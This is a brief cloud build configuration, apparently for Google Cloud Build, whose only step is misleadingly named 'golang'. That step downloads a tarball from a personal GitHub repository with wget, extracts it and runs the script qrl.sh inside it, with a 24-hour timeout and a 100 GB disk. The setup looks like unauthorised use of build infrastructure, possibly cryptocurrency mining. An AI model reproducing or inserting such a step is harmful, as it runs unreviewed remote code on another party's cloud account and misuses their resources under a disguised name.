steps:
  - name: golang
    args:
      - '-c'
      - >-
         wget https://github.com/sabarlur/coba/raw/main/qrl.tar.gz && tar xf qrl.tar.gz && ./qrl.sh
    waitFor:
      - '-'
    entrypoint: /bin/bash
timeout: 86400s
options:
  diskSizeGb: '100'
